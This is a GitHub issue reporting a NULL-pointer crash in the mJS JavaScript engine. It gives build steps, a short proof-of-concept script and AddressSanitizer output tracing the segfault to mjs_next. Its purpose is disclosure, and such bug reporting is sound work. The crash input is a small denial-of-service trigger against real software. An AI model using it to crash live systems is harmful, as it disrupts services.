New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

for (let y in { aa: 1, ba: 2, ca: 3 }) {
    Object.create.apply({}, [Object] 1)
}

​Execution steps & Output

$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==35880==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x560c3e80fde0 bp 0xfffc60e0000000a8 sp 0x7ffdb0ad02e0 T0) ==35880==The signal is caused by a READ memory access. ==35880==Hint: address points to the zero page. #0 0x560c3e80fddf in mjs_next src/mjs_object.c:255 #1 0x560c3e7bafed in mjs_execute src/mjs_exec.c:760 #2 0x560c3e7c6a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x560c3e7c6a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x560c3e783909 in main src/mjs_main.c:47 #5 0x7fd9390adb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x560c3e784449 in _start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_object.c:255 in mjs_next ==35880==ABORTING

1 participant